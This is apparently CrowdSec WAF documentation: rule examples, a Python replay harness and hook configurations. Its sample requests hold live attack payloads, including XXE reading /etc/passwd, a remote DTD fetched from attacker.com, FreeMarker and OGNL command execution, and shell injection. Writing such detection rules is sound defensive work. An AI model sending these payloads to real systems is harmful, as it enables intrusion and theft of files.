Version: Next

WAF Rules Examples

This page showcases various WAF rule capabilities with real-world examples from the CrowdSec Hub. Each example includes the rule definition, a matching HTTP request from the test suite, and explanations of the key features demonstrated.

1. Header Analysis - Missing User Agent Detection

Description

Header inspection with the count transform. An empty User-Agent header and an absent User-Agent header are treated the same: both leave the count at 0, so a request that sends "User-Agent:" with no value matches exactly like a request that omits the header.

Rule Example

rules:
  - and:
    - zones:
      - METHOD
      match:
        type: regex
        value: '^(GET|POST|PUT|DELETE|PATCH)$'
    - zones:
      - HEADERS
      variables:
        - "User-Agent"
      transform:
        - count
      match:
        type: equals
        value: "0"

HTTP Request Example

GET / HTTP/1.1
Host: example.com
User-Agent:

Key Features Demonstrated

  • Header inspection using the HEADERS zone with a named variable (User-Agent)
  • The count transform to test header presence: a missing or empty header yields "0"
  • HTTP method filtering with an anchored regex alternation (the parentheses matter: without them ^ and $ bind only to the first and last alternatives)
  • AND logic combining multiple conditions

2. Request Body Analysis - JSON Path Extraction

Description

JSON path extraction with dot notation: a field in a JSON body is addressed through BODY_ARGS with a dotted path prefixed by json., and the rule fires when that field carries an inline XML entity declaration (<!ENTITY).

Rule Example

rules:
  - and:
    - zones:
      - METHOD
      transform:
        - uppercase
      match:
        type: equals
        value: POST
    - zones:
      - URI
      transform:
        - lowercase
      match:
        type: contains
        value: /rest/v1/guest-carts/1/estimate-shipping-methods
    - zones:
      - BODY_ARGS
      variables:
        - json.address.totalsCollector.collectorList.totalCollector.sourceData.data
      transform:
        - lowercase
      match:
        type: contains
        value: "<!entity"

HTTP Request Example

POST /rest/v1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: example.com
Content-Type: application/json

{
  "address": {
    "totalsCollector": {
      "collectorList": {
        "totalCollector": {
          "sourceData": {
            "data": "<!ENTITY xxe SYSTEM \"file:///etc/passwd\">",
            "dataIsURL": "true"
          }
        }
      }
    }
  }
}

Key Features Demonstrated

  • Deep JSON path navigation using dot notation
  • Request body parsing with BODY_ARGS zone
  • Multiple transform operations (uppercase, lowercase)
  • Complex AND conditions across different zones

3. Query Parameter Inspection - SSTI Detection

Description

Multi-zone pattern matching (ARGS and RAW_BODY). The ARGS zone exposes query parameters after URL decoding, which is why the rule needs no urldecode transform: the deviceUdid value in the request below decodes to ${"freemarker.template.utility.Execute"?new()("cat /etc/hosts")}, and lowercasing it produces the signature the rule looks for.

Rule Example

rules:
  - and:
    - zones:
      - RAW_BODY
      - ARGS
      transform:
        - lowercase
      match:
        type: contains
        value: 'freemarker.template.utility.execute'

HTTP Request Example

GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d HTTP/1.1
Host: example.com

Key Features Demonstrated

  • URL parameter parsing with ARGS zone
  • Multiple zone matching (RAW_BODY and ARGS)
  • String transformation with lowercase normalization
  • Pattern-based detection using contains match

4. File Upload Detection - WordPress PHP Execution

Description

URI regex matching with multiple transforms. Transforms run in the order listed: the URI is lowercased and then URL-decoded, so an encoded extension such as %2Ephp becomes .php before the regex runs. The pattern is not anchored to the end of the path, so a name such as shell.php.bak under the uploads directory is caught as well.

Rule Example

rules:
  - and:
    - zones:
      - URI
      transform:
        - lowercase
        - urldecode
      match:
        type: regex
        value: '/wp-content/uploads/.*\.(h?ph(p|tm?l?|ar)|module|shtml)'

HTTP Request Example

GET /wp-content/uploads/2024/10/test.php?exec=id HTTP/1.1
Host: example.com

Key Features Demonstrated

  • URI path analysis with regex pattern matching
  • Multiple transforms (lowercase and URL decoding)
  • Complex regex patterns for file extension detection
  • WordPress-specific protection against upload directory exploitation

5. HTTP Protocol Analysis - Form Data Validation

Description

Form data analysis with variable targeting: each BODY_ARGS condition names one form field, and because all four conditions are ANDed the rule fires only when a POST to the login endpoint carries the default admin/parks pair.

Rule Example

rules:
  - and:
    - zones:
      - METHOD
      transform:
        - lowercase
      match:
        type: equals
        value: post
    - zones:
      - URI
      transform:
        - lowercase
      match:
        type: endsWith
        value: /boaform/admin/formlogin
    - zones:
      - BODY_ARGS
      variables:
        - username
      transform:
        - lowercase
      match:
        type: equals
        value: "admin"
    - zones:
      - BODY_ARGS
      variables:
        - psd
      transform:
        - lowercase
      match:
        type: equals
        value: "parks"

HTTP Request Example

POST /boaform/admin/formLogin HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

username=admin&psd=parks

Key Features Demonstrated

  • Form data analysis with BODY_ARGS and specific variable targeting
  • HTTP method validation with case-insensitive matching
  • URI endpoint matching using endsWith comparison
  • Credential pattern detection for default login attempts

6. Header Names Analysis

Description

Header name inspection (HEADERS_NAMES zone): the rule checks which headers are present on the request, not what they contain.

Rule Example

rules:
  - and:
    - zones:
      - URI
      transform:
        - lowercase
      match:
        type: contains
        value: /mgmt/tm/util/bash
    - zones:
      - HEADERS_NAMES
      transform:
        - lowercase
      match:
        type: contains
        value: x-f5-auth-token
    - zones:
      - HEADERS_NAMES
      transform:
        - lowercase
      match:
        type: contains
        value: authorization

HTTP Request Example

POST /mgmt/tm/util/bash HTTP/1.1
Host: example.com
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: a
Authorization: Basic YWRtaW46
Content-Type: application/json

{
  "command": "run",
  "utilCmdArgs": "-c 'id'"
}

Key Features Demonstrated

  • Header name inspection using HEADERS_NAMES zone
  • Multiple header validation combining different authentication headers
  • Case-insensitive header matching with lowercase transform
  • API endpoint protection for management interfaces

7. Simple URI Pattern Matching - Environment File Access

Description

Simple URI pattern matching with endsWith.

Rule Example

rules:
  - zones:
    - URI
    transform:
      - lowercase
    match:
      type: endsWith
      value: .env

HTTP Request Example

GET /foo/bar/.env HTTP/1.1
Host: example.com

Key Features Demonstrated

  • Simple URI matching without complex AND conditions
  • File extension detection using endsWith matcher
  • Case normalization with lowercase transform
  • Environment file protection for configuration security

8. Regular Expression Validation - Command Injection Detection

Description

Regex pattern matching for input validation. The class [^a-f0-9:.]+ matches any character that cannot appear in an IPv4 or IPv6 literal, so shell metacharacters such as ; or a space trip it; a hostname in target_addr would trip it too, which is acceptable for a ping form that expects addresses. Note that METHOD is compared here without a lowercase transform, so that equals match is case-sensitive.

Rule Example

rules:
  - and:
    - zones:
      - METHOD
      match:
        type: equals
        value: POST
    - zones:
      - URI
      transform:
        - lowercase
      match:
        type: endsWith
        value: /boaform/admin/formping
    - zones:
      - BODY_ARGS
      variables:
        - target_addr
      transform:
        - lowercase
      match:
        type: regex
        value: "[^a-f0-9:.]+"

HTTP Request Example

POST /boaform/admin/formPing HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

target_addr=1.2.3.4;cat /etc/passwd

Key Features Demonstrated

  • Regex pattern matching for command injection detection
  • Character class validation to identify suspicious input
  • Form parameter filtering on specific variables
  • Command injection prevention through pattern recognition

9. Complex JSON Processing - Multi-condition XXE

Description

Multi-property JSON validation.

Rule Example

rules:
  - and:
    - zones:
      - METHOD
      transform:
        - lowercase
      match:
        type: equals
        value: post
    - zones:
      - URI
      transform:
        - lowercase
      match:
        type: contains
        value: /rest/v1/guest-carts/1/estimate-shipping-methods
    - zones:
      - BODY_ARGS
      variables:
        - json.address.totalsCollector.collectorList.totalCollector.sourceData.data
      transform:
        - lowercase
      match:
        type: contains
        value: "://"
    - zones:
      - BODY_ARGS
      variables:
        - json.address.totalsCollector.collectorList.totalCollector.sourceData.dataIsURL
      transform:
        - lowercase
      match:
        type: equals
        value: "true"

HTTP Request Example

POST /rest/v1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: example.com
Content-Type: application/json

{
  "address": {
    "totalsCollector": {
      "collectorList": {
        "totalCollector": {
          "sourceData": {
            "data": "http://attacker.com/malicious.dtd",
            "dataIsURL": "true"
          }
        }
      }
    }
  }
}

Key Features Demonstrated

  • Multi-property JSON validation checking both data content and flags
  • URL scheme detection using contains match for "://"
  • Boolean flag inspection in JSON structures
  • Complex attack vector prevention through comprehensive validation

10. Template Injection in Request Body - POST Data Analysis

Description

Raw body content analysis with multi-zone matching.

Rule Example

rules:
  - and:
    - zones:
      - RAW_BODY
      - ARGS
      transform:
        - lowercase
      match:
        type: contains
        value: 'freemarker.template.utility.execute'

HTTP Request Example

POST /template/aui/text-inline.vm HTTP/1.1
Host: example.com
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded

label=aaa\u0027%2b#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.poc[0],{})%2b\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\u0027x_vuln_check\u0027,(new+freemarker.template.utility.Execute()).exec({"whoami"}))

Key Features Demonstrated

  • POST body content analysis using RAW_BODY zone
  • Template injection detection through signature-based matching
  • URL-encoded payload handling in form submissions
  • Multi-zone coverage examining both args and raw body content
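To make the evaluation order behind the examples above concrete (values are collected from every listed zone, the transforms run in sequence, the match runs on each resulting value, and every condition under and must hold), here is an added example that replays three of the test requests against transcriptions of rules 1, 3 and 9. It is this editor's simplified re-implementation, not the CrowdSec engine or any Hub item: the rules are Python dicts mirroring the YAML so that no YAML library is needed, the rule and request names are made up, and only the zones, transforms and matchers used on this page are implemented.

```python
# Added example, not CrowdSec code: a small re-implementation of the rule semantics shown on this
# page (zones, variables, transforms, match types, "and") used to replay the test requests offline.
import json
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

def parse_request(raw):
    """Split a raw HTTP/1.1 request into the zones the rules reference."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    if body and headers.get("content-type", "").startswith("application/json"):
        body_args = {"json": json.loads(body)}  # exposes the json.<path> variables
    else:
        body_args = dict(parse_qsl(body, keep_blank_values=True))
    return {"METHOD": method, "URI": url.path, "RAW_BODY": body,
            "ARGS": dict(parse_qsl(url.query, keep_blank_values=True)),  # values already URL-decoded
            "HEADERS": headers, "HEADERS_NAMES": list(headers), "BODY_ARGS": body_args}

def lookup(container, variable):
    """Resolve a variable name; dots walk nested JSON, keys compare case-insensitively."""
    node = container
    for part in variable.split("."):
        key = next((k for k in node if k.lower() == part.lower()), None) if isinstance(node, dict) else None
        if key is None:
            return []
        node = node[key]
    return [node if isinstance(node, str) else json.dumps(node)]

def zone_values(req, zone, variables):
    data = req[zone]
    if isinstance(data, str):  # METHOD, URI, RAW_BODY
        return [data]
    if isinstance(data, list):  # HEADERS_NAMES
        return data
    if not variables:  # whole zone: every value it holds
        return [v for v in data.values() if isinstance(v, str)]
    return [v for var in variables for v in lookup(data, var)]

SIMPLE_TRANSFORMS = {"lowercase": str.lower, "uppercase": str.upper, "urldecode": unquote_plus}
MATCHERS = {"equals": lambda v, p: v == p, "contains": lambda v, p: p in v,
            "endsWith": lambda v, p: v.endswith(p), "regex": lambda v, p: re.search(p, v) is not None}

def apply_transforms(values, transforms):
    for name in transforms or []:
        if name == "count":  # an empty header value counts as absent, as example 1 notes
            values = [str(sum(1 for v in values if v != ""))]
        else:
            values = [SIMPLE_TRANSFORMS[name](v) for v in values]
    return values

def condition_matches(req, cond):
    values = [v for z in cond["zones"] for v in zone_values(req, z, cond.get("variables"))]
    values = apply_transforms(values, cond.get("transform"))
    return any(MATCHERS[cond["match"]["type"]](v, cond["match"]["value"]) for v in values)

def rule_matches(req, rule):
    """A rule is a single condition or an 'and' list of conditions that must all hold."""
    if "and" in rule:
        return all(condition_matches(req, c) for c in rule["and"])
    return condition_matches(req, rule)

JSON_PATH = "json.address.totalsCollector.collectorList.totalCollector.sourceData."
RULES = {  # transcribed from examples 1, 3 and 9; the names are made up
    "missing-user-agent": {"and": [
        {"zones": ["METHOD"], "match": {"type": "regex", "value": "^(GET|POST|PUT|DELETE|PATCH)$"}},
        {"zones": ["HEADERS"], "variables": ["User-Agent"], "transform": ["count"],
         "match": {"type": "equals", "value": "0"}}]},
    "freemarker-ssti": {"zones": ["RAW_BODY", "ARGS"], "transform": ["lowercase"],
                        "match": {"type": "contains", "value": "freemarker.template.utility.execute"}},
    "xxe-remote-dtd": {"and": [
        {"zones": ["METHOD"], "transform": ["lowercase"], "match": {"type": "equals", "value": "post"}},
        {"zones": ["URI"], "transform": ["lowercase"],
         "match": {"type": "contains", "value": "/rest/v1/guest-carts/1/estimate-shipping-methods"}},
        {"zones": ["BODY_ARGS"], "variables": [JSON_PATH + "data"], "transform": ["lowercase"],
         "match": {"type": "contains", "value": "://"}},
        {"zones": ["BODY_ARGS"], "variables": [JSON_PATH + "dataIsURL"], "transform": ["lowercase"],
         "match": {"type": "equals", "value": "true"}}]},
}
XXE_BODY = {"address": {"totalsCollector": {"collectorList": {"totalCollector": {"sourceData": {
    "data": "http://attacker.com/malicious.dtd", "dataIsURL": "true"}}}}}}
REQUESTS = {  # constructed from the page's test requests, plus one benign request
    "no-ua": "GET / HTTP/1.1\nHost: example.com\nUser-Agent:\n\n",
    "ssti": "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22freemarker.template.utility"
            ".Execute%22%3fnew%28%29%28%22cat%20%2fetc%2fhosts%22%29%7d HTTP/1.1\nHost: example.com\n"
            "User-Agent: curl/8.5.0\n\n",
    "xxe": "POST /rest/v1/guest-carts/1/estimate-shipping-methods HTTP/1.1\nHost: example.com\n"
           "User-Agent: curl/8.5.0\nContent-Type: application/json\n\n" + json.dumps(XXE_BODY),
    "benign": "GET /index.html HTTP/1.1\nHost: example.com\nUser-Agent: Mozilla/5.0\n\n",
}

def matching_rules(raw_request):
    req = parse_request(raw_request)
    return sorted(name for name, rule in RULES.items() if rule_matches(req, rule))

if __name__ == "__main__":
    for name, raw in REQUESTS.items():
        print(f"{name:>7}: {matching_rules(raw) or 'no match'}")
```

Running it prints the rule that fires for each request; the benign request matches none. Two details are worth carrying over when reading the real rules: ARGS values arrive already URL-decoded, which is why example 3 needs no urldecode transform, and count treats an empty header value like a missing header, which is the behaviour example 1 relies on.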

Hooks Examples

Hooks allow you to customize WAF behavior at different execution phases. This section demonstrates key hook capabilities organized by execution phase.

Pre-Evaluation Phase (pre_eval)

Pre-evaluation hooks run before rules are evaluated, allowing you to modify rule behavior dynamically per request.

1. Disable Rules by Name

Description

Dynamically disable specific rules before evaluation.

Hook Example

pre_eval:
  - filter: req.URL.Path == "/admin/upload"
    apply:
      - RemoveInBandRuleByName('some-specific-rule')

Use Case

Disable existing rules on specific endpoints.

2. Disable Rules by Tag

Description

Disable multiple rules sharing the same tag.

Hook Example

pre_eval:
  - apply:
      - RemoveInBandRuleByTag('some-specific-tag')

Use Case

Disable all rules with a specific tag.

3. Change Rule Remediation by Name

Description

Modify the default remediation for specific rules.

Hook Example

pre_eval:
  - apply:
      - SetRemediationByName('some-rule', 'log')

Use Case

Change a blocking rule to log-only mode for testing.

4. Disable Rules by ID

Description

Disable specific rules using their unique ID during request processing.

Hook Example

pre_eval:
  - filter: req.Method == "DELETE"
    apply:
      - RemoveInBandRuleByID(123)

Use Case

Disable a specific rule by its ID for certain endpoints or conditions where the rule may cause false positives.

Post-Evaluation Phase (post_eval)

Post-evaluation hooks run after rule evaluation is complete, primarily used for debugging and logging.

5. Debug Request Dumping

Description

Dump request details to file for debugging.

Hook Example

post_eval:
  - filter: IsInBand == true
    apply:
      - DumpRequest().WithBody().ToJSON()

Use Case

Capture full request details for forensic analysis or debugging rule behavior.

On-Match Phase (on_match)

On-match hooks run when a rule matches, allowing you to modify the response behavior.

6. Change HTTP Response Code

Description

Modify the HTTP status code returned to users when a rule matches.

Hook Example

on_match:
  - filter: IsInBand == true
    apply:
      - SetReturnCode(413)

Use Case

Return a 413 "Payload Too Large" instead of the default 403 when a rule triggers.

7. Change Remediation Action

Description

Dynamically change the remediation action from the default.

Hook Example

on_match:
  - filter: IsInBand == true
    apply:
      - SetRemediation('captcha')

Use Case

Show a captcha instead of blocking the request for certain rule matches.

8. Allow Specific IPs

Description

Override blocking for trusted IP addresses.

Hook Example

on_match:
  - filter: IsInBand == true && req.RemoteAddr == "192.168.1.100"
    apply:
      - SetRemediation('allow')

Use Case

Allow internal/admin IPs to bypass security rules while keeping protection for others. This is only safe when the address the AppSec component sees is the real client address; if it is derived from a header the client can set, the allow-list can be spoofed.

9. Cancel Alert Generation

Description

Prevent alert creation while keeping the request blocked.

Hook Example

on_match:
  - filter: IsInBand == true
    apply:
      - CancelAlert()

Use Case

Block suspicious requests without generating alerts for known false positives.

10. Force Alert for Out-of-Band Rules

Description

Generate alerts for monitoring rules that normally only log.

Hook Example

on_match:
  - filter: IsOutBand == true
    apply:
      - SendAlert()

Use Case

Create alerts for reconnaissance attempts detected by monitoring rules.

11. Hook Flow Control

Description

Control execution of subsequent hooks with break/continue.

Hook Example

on_match:
  - filter: IsInBand == true
    apply:
      - CancelEvent()
    on_success: break
  - filter: IsInBand == true
    apply:
      - SetRemediation('captcha')

Use Case

Cancel event generation and stop processing further hooks.

Hook Execution Phases Summary

  • on_load: Rule loading phase - disable/modify rules permanently
  • pre_eval: Before rule evaluation - dynamic rule modification per request
  • on_match: After rule match - modify response behavior
  • post_eval: After evaluation - debugging and logging
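The snippets above each show one hook in isolation. The following added example assembles several of them into one AppSec configuration so the phases and the effect of hook ordering are visible together. It is written by this editor and is not a Hub item: the top-level keys name, default_remediation, inband_rules and outofband_rules follow the CrowdSec AppSec configuration format as this editor understands it, and the rule collection names under example/ are placeholders to replace with your own.

```yaml
# Added example, not a Hub item: an AppSec configuration wiring together hooks from this page.
# Rule collection names are placeholders; the hook functions are the ones documented above.
name: example/appsec-with-hooks
default_remediation: ban

inband_rules:
  - example/inband-rules        # placeholder: rules that block
outofband_rules:
  - example/outofband-rules     # placeholder: rules that only observe

pre_eval:
  # Hooks run in order; a hook without a filter applies to every request.
  - apply:
      - SetRemediationByName('some-rule', 'log')          # trial a rule in log-only mode
  - filter: req.URL.Path == "/admin/upload"
    apply:
      - RemoveInBandRuleByName('some-specific-rule')      # known false positive on one endpoint

on_match:
  # Ordering matters: the trusted-address hook breaks, so the captcha hook below never
  # runs for that client. Without on_success: break both hooks would apply in sequence.
  - filter: IsInBand == true && req.RemoteAddr == "192.168.1.100"
    apply:
      - SetRemediation('allow')
    on_success: break
  - filter: IsInBand == true
    apply:
      - SetRemediation('captcha')                         # soften blocks for everyone else
  - filter: IsOutBand == true
    apply:
      - SendAlert()                                       # make monitoring rules visible

post_eval:
  - filter: IsInBand == true
    apply:
      - DumpRequest().WithBody().ToJSON()                 # keep evidence for blocked requests
```

Read the on_match list top to bottom as the engine would: the trusted-address check must come before the captcha hook, because once the captcha hook has run there is nothing after it to restore the allow remediation.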

Summary of WAF Capabilities

These examples demonstrate the comprehensive capabilities of the CrowdSec WAF engine:

  • Zone-based analysis: Headers, URI, Body, Args, Method inspection
  • Transform operations: Case normalization, URL decoding, counting
  • Match types: Exact equals, contains, regex, endsWith patterns
  • JSON processing: Deep object navigation with dot notation
  • Complex logic: AND/OR conditions across multiple zones
  • Variable targeting: Specific parameter and header name filtering
  • Dynamic behavior: Hooks for runtime customization
  • Security coverage: the examples above address SSTI, XXE, command injection and RCE, PHP execution from upload directories, default-credential logins and configuration-file exposure; XSS and SQLi rules are built from the same zones, transforms and matchers